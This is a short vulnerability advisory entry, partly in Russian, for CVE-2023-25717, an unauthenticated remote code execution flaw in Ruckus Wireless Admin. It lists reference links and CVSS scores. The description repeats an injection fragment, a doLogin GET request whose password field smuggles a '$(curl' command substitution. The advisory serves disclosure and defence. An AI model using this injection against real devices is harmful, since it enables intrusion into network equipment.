Описание
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
Ссылки
- https://nvd.nist.gov/vuln/detail/CVE-2023-25717
- https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf
- https://support.ruckuswireless.com/security_bulletins/315
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717
Связанные уязвимости
CVSS3: 9.8
nvd
почти 3 года назад
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
CVSS3: 9.8
fstec
почти 3 года назад
Уязвимость панели администрирования Ruckus Wireless Admin сетевых устройств Ruckus Wireless, позволяющая нарушителю выполнить произвольный код